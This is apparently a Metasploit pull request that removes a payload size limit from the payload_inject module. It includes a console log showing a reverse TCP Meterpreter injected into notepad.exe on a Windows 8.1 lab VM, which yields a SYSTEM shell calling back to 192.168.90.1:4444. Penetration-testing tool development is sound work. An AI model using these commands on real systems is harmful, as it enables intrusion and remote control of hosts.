### PR TITLE
Remove the size restriction from payload_inject

### DIFF
--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -30,7 +30,6 @@ class MetasploitModule < Msf::Exploit::Local
       'Targets'         => [ [ 'Windows', {} ] ],
       'Payload'         =>
         {
-          'Space'       => 4096,
           'DisableNops' => true
         },
       'DefaultTarget'   => 0,

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -28,10 +28,6 @@ class MetasploitModule < Msf::Exploit::Local
       'Arch'            => [ ARCH_X86, ARCH_X64 ],
       'SessionTypes'    => [ 'meterpreter' ],
       'Targets'         => [ [ 'Windows', {} ] ],
-      'Payload'         =>
-        {
-          'DisableNops' => true
-        },
       'DefaultTarget'   => 0,
       'DisclosureDate'  => "Oct 12 2011"
     ))


### PR DESCRIPTION
This Pull Request removes the unnecessary size restriction from the `exploit/windows/local/payload_inject` module. This has the notable advantage of enabling use of the newer and much larger stageless payloads (like `windows/x64/meterpreter_reverse_tcp`).

The size restriction isn't necessary since the module will handle allocating the necessary space for the payload anyways.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a functioning session on a Windows host
- [x] `use exploit/windows/local/payload_inject`
- [x] Set the payload to a newly-available large stageless one
  - [x] `set PAYLOAD windows/x64/meterpreter_reverse_tcp`
- [x] Run the module and get a functioning session corresponding to the selected payload

## Example Usage
```
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDOWS8VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 1...
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > set PAYLOAD windows/x64/meterpreter_reverse_tcp
PAYLOAD => windows/x64/meterpreter_reverse_tcp
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > set LHOST 192.168.90.1 
LHOST => 192.168.90.1
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > set SESSION -1
SESSION => -1
metasploit-framework (S:1 J:1) exploit(windows/local/payload_inject) > exploit

[*] [2018.10.27-21:23:43] Started reverse TCP handler on 192.168.90.1:4444 
[*] [2018.10.27-21:23:43] Running module against WINDOWS8VM
[-] [2018.10.27-21:23:43] PID  does not actually exist.
[*] [2018.10.27-21:23:43] Launching notepad.exe...
[*] [2018.10.27-21:23:43] Performing Architecture Check
[*] [2018.10.27-21:23:43] Process found checking Architecture
[+] [2018.10.27-21:23:43] Process is the same architecture as the payload
[*] [2018.10.27-21:23:43] Preparing 'windows/x64/meterpreter_reverse_tcp' for PID 3196
[*] [2018.10.27-21:23:44] Creating the thread to execute in 0x400000 (pid=3196)
[*] Meterpreter session 2 opened (192.168.90.1:4444 -> 192.168.90.12:49177) at 2018-10-27 21:23:44 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WINDOWS8VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getpid
Current pid: 3196
meterpreter > 
```